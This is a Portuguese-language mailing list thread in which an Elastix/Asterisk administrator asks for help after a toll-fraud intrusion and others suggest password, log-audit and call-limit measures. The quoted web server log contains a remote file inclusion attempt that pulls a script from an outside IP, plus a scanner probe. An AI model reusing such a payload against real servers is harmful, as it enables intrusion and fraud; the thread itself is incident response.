Não sou a melhor pessoa para lhe responder sobre segurança no asterisk, porém tenho muitos conceitos de políticas de segurança, uma delas vc já até disse, limitar número de conexões/canais/chamadas, tem sim, uma leitura vc encontrará muitas formas de blindar o servidor.<br>

<br>Porém nada adianta se vc tem senhas fracas.<br><br><div class="gmail_quote">Em 22 de novembro de 2010 14:25, Gleidison Sampaio <span dir="ltr">&lt;<a href="mailto:gleidison.sampaio@hotmail.com">gleidison.sampaio@hotmail.com</a>&gt;</span> escreveu:<br>

<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">



<div>
é possivel limitar a quantidade de ligaçoes simultaneas por ramal?<br><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size: 12pt;">Gleidison C. Sampaio</span></font></b></div>

<br><br><hr>From: <a href="mailto:gleidison.sampaio@hotmail.com" target="_blank">gleidison.sampaio@hotmail.com</a><div class="im"><br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org" target="_blank">asteriskbrasil@listas.asteriskbrasil.org</a><br>

</div>Date: Mon, 22 Nov 2010 13:23:47 -0400<div><div></div><div class="h5"><br>Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6<br><br>






Nielsen,<div><br></div><div>Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões.<br>

<br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size: 12pt;">Gleidison C. Sampaio</span></font></b></div><div><br></div><div><font color="#17365d"><br></font></div>

<br><hr>From: <a href="mailto:nielsen@freesolutions.com.br" target="_blank">nielsen@freesolutions.com.br</a><br>Date: Mon, 22 Nov 2010 13:51:04 -0300<br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org" target="_blank">asteriskbrasil@listas.asteriskbrasil.org</a><br>

Subject: Re: [AsteriskBrasil]        RES: Duvida ( SEGURANÇA ) Elastix 1.6<br><br>Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação.<br>



<br>Pensou nisso tudo ?<br><br>No final das contas é preciso a auditoria para identificar a origem da invasão.<br><br><div>Em 22 de novembro de 2010 13:40, Gleidison Sampaio <span dir="ltr">&lt;<a href="mailto:gleidison.sampaio@hotmail.com" target="_blank">gleidison.sampaio@hotmail.com</a>&gt;</span> escreveu:<br>



<blockquote style="padding-left: 1ex;">



<div>
Sim no Elastix 1.6<div><br><div>ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar.</div>



<div><br></div><div><span style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12pt;"><table style="font-size: 8pt;" align="center" cellpadding="0" cellspacing="0" width="100%">

<tbody><tr style="background-color: rgb(255, 255, 255);"></tr><tr style="background-color: rgb(255, 255, 255);"><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td></tr><tr style="background-color: rgb(255, 255, 255);">

<td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">2010-11-21 21:14:01</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



XXXX</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">00393396976261</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



SIP/TRUNK</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"> </td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



SIP/TRUNK</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">ANSWERED</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



1045</td></tr><tr style="background-color: rgb(255, 255, 255);"><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">

</td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;"><br></td><td style="font-family: verdana,arial,helvetica,sans-serif; color: rgb(0, 0, 0); font-size: 8pt; padding: 4px;">



<br><br></td></tr></tbody></table></span><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size: 12pt;">Gleidison C. Sampaio</span></font></b></div><div><br></div>



<br><br><br><br><hr>From: <a href="mailto:nielsen@freesolutions.com.br" target="_blank">nielsen@freesolutions.com.br</a><br>Date: Mon, 22 Nov 2010 13:27:16 -0300<div><br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org" target="_blank">asteriskbrasil@listas.asteriskbrasil.org</a><br>



</div>Subject: Re: [AsteriskBrasil]        RES: Duvida ( SEGURANÇA ) Elastix 1.6<div><div></div><div><br><br>Opa, foi no seu ELASTIX 1.6?<br><br>Qual a posição que se encontra seu servidor voip na sua rede ?<br><br><div>

Em 22 de novembro de 2010 13:20, Gleidison Sampaio <span dir="ltr">&lt;<a href="mailto:gleidison.sampaio@hotmail.com" target="_blank">gleidison.sampaio@hotmail.com</a>&gt;</span> escreveu:<br>

<blockquote style="padding-left: 1ex;">



<div>
Sidinei,<div><br></div><div>Obrigado pela Resposta, </div><div><br></div><div>cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso.</div>





<div><br></div><div>/var/log/httpd/access_log</div><div><br></div><div><div>72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] &quot;GET /user/soapCaller.bs HTTP/1.1&quot; 302 305 &quot;-&quot; &quot;Morfeus Fucking Scanner&quot;</div>





<div>72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] &quot;GET /appserv/main.php?appserv_root=<a href="http://88.255.225.20/appserv/t.txt" target="_blank">http://88.255.225.20/appserv/t.txt</a>? HTTP/1.1&quot; 302 354 &quot;-&quot; &quot;Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)&quot;</div>





<div><br></div><br><div><br></div><div><br></div><div>Att;</div><div><br></div><div><b><font face="Tahoma"><span style="font-size: 12pt;">Gleidison C. Sampaio</span></font></b></div><div><br></div><div><font color="#17365d"><br>





</font></div><br><br><br><br><hr>From: <a href="mailto:sidnei_rp@ig.com.br" target="_blank">sidnei_rp@ig.com.br</a><br>To: <a href="mailto:asteriskbrasil@listas.asteriskbrasil.org" target="_blank">asteriskbrasil@listas.asteriskbrasil.org</a><br>





Date: Mon, 22 Nov 2010 14:00:10 -0200<br>Subject: [AsteriskBrasil] RES:  Duvida ( SEGURANÇA ) Elastix 1.6<br><br>


<div><span style="font-size: 11pt; color: rgb(31, 73, 125);">Não, pois estão todas as linhas comentadas (é só um exemplo). </span><br><span style="font-size: 11pt; color: rgb(31, 73, 125);"> </span><br><div><div style="border-width: 1pt medium medium; border-style: solid none none; border-color: rgb(181, 196, 223) -moz-use-text-color -moz-use-text-color; padding: 3pt 0cm 0cm;">





<b><span style="font-size: 10pt;">De:</span></b><span style="font-size: 10pt;"> <a href="mailto:asteriskbrasil-bounces@listas.asteriskbrasil.org" target="_blank">asteriskbrasil-bounces@listas.asteriskbrasil.org</a> [mailto:<a href="mailto:asteriskbrasil-bounces@listas.asteriskbrasil.org" target="_blank">asteriskbrasil-bounces@listas.asteriskbrasil.org</a>] <b>Em nome de </b>Gleidison Sampaio<br>





<b>Enviada em:</b> segunda-feira, 22 de novembro de 2010 13:40<br><b>Para:</b> Asterisk Lista<br><b>Assunto:</b> [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6</span><br></div></div> <br><span style="font-size: 10pt;">Boa tarde Lista!</span><br>





<div><span style="font-size: 10pt;"> </span><br></div><div><span style="font-size: 10pt;">hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor</span><br>





</div><div><span style="font-size: 10pt;"> </span><br></div><div><span style="font-size: 10pt;">/etc/asterisk/users.conf</span><br></div><div><span style="font-size: 10pt;"> </span><br></div><div><div><span style="font-size: 10pt;">;[6000]</span><br>





</div><div><span style="font-size: 10pt;">;fullname = Joe User</span><br></div><div><span style="font-size: 10pt;">;email = joe@foo.bar</span><br></div><div><span style="font-size: 10pt;">;secret = xxxx</span><br>

</div><div><span style="font-size: 10pt;">;zapchan = 1</span><br></div><div><span style="font-size: 10pt;">;hasvoicemail = yes</span><br></div><div><span style="font-size: 10pt;">;vmsecret = xxxx</span><br></div>

<div><span style="font-size: 10pt;">;hassip = yes</span><br></div><div><span style="font-size: 10pt;">;hasiax = no</span><br></div><div><span style="font-size: 10pt;">;hash323 = no</span><br></div><div><span style="font-size: 10pt;">;hasmanager = no</span><br>





</div><div><span style="font-size: 10pt;">;callwaiting = no</span><br></div><div><span style="font-size: 10pt;">;context = international</span><br></div><div><span style="font-size: 10pt;"> </span><br></div><span style="font-size: 10pt;"> </span><br>





<div><span style="font-size: 10pt;"> </span><br></div><div><span style="font-size: 10pt;"> </span><br></div><div><span style="font-size: 10pt;">Att;</span><br></div><div><span style="font-size: 10pt;"> </span><br>

</div><div><span><b><span>Gleidison C. Sampaio</span></b></span><span style="font-size: 10pt;"></span><br></div><div><span style="font-size: 10pt;"> </span><br></div><div><span style="font-size: 10pt;"> </span><br>

</div></div></div><br><br></div></div></blockquote></div></div></div></div></div>                                               </div>
<br><br></blockquote></div></div>                                               
<br><br>                                               </div></div></div>
<br>_______________________________________________<br>
KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk.<br>
- Hardware com alta disponibilidade de recursos e qualidade KHOMP<br>
- Suporte técnico local qualificado e gratuito<br>
Conheça a linha completa de produtos KHOMP em <a href="http://www.khomp.com.br" target="_blank">www.khomp.com.br</a><br>
_______________________________________________<br>
Temos tudo para seu projeto VoIP com Asterisk!<br>
Descontos especiais para assinantes da AsteriskBrasil.org.<br>
Registre-se e receba um cupom exclusivo de desconto!<br>
Acesse agora <a href="http://www.voipmania.com.br" target="_blank">www.voipmania.com.br</a><br>
______________________________________________<br>
Lista de discussões AsteriskBrasil.org<br>
<a href="mailto:AsteriskBrasil@listas.asteriskbrasil.org">AsteriskBrasil@listas.asteriskbrasil.org</a><br>
<a href="http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil" target="_blank">http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil</a><br>
______________________________________________<br>
Para remover seu email desta lista, basta enviar um email em branco para <a href="mailto:asteriskbrasil-unsubscribe@listas.asteriskbrasil.org">asteriskbrasil-unsubscribe@listas.asteriskbrasil.org</a><br></blockquote></div>

<br><br clear="all"><br>-- <br>At.<br><br>              <br>           ____________________________<br>                  Nielsen Alves de Oliveira<br>     Consultor em Sistemas Computacionais<br>                              CIO<br>

                      Free Solutions <br>                Telefone: (65) 3025-7356<br>            Celular: (65) 9287-5331 (Vivo)<br><br>